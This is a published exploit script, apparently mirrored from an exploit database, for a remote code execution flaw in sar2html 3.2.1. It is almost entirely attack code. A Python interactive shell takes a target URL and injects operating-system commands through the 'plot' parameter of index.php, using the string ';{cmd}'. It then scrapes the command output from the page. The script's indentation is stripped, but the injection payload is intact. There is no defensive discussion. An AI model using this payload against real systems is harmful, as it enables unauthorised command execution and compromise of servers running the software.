Exploit for sar2html 3.2.1 Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:160781
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution  
# Date: 27-12-2020  
# Exploit Author: Musyoka Ian  
# Vendor Homepage:https://github.com/cemtan/sar2html   
# Software Link: https://sourceforge.net/projects/sar2html/  
# Version: 3.2.1  
# Tested on: Ubuntu 18.04.1  
  
#!/usr/bin/env python3  
  
import requests  
import re  
from cmd import Cmd  
  
url = input("Enter The url => ")  
  
class Terminal(Cmd):  
prompt = "Command => "  
def default(self, args):  
exploiter(args)  
  
def exploiter(cmd):  
global url  
sess = requests.session()  
output = sess.get(f"{url}/index.php?plot=;{cmd}")  
try:  
out = re.findall("<option value=(.*?)>", output.text)  
except:  
print ("Error!!")  
for ouut in out:  
if "There is no defined host..." not in ouut:  
if "null selected" not in ouut:  
if "selected" not in ouut:  
print (ouut)  
print ()  
  
if __name__ == ("__main__"):  
terminal = Terminal()  
terminal.cmdloop()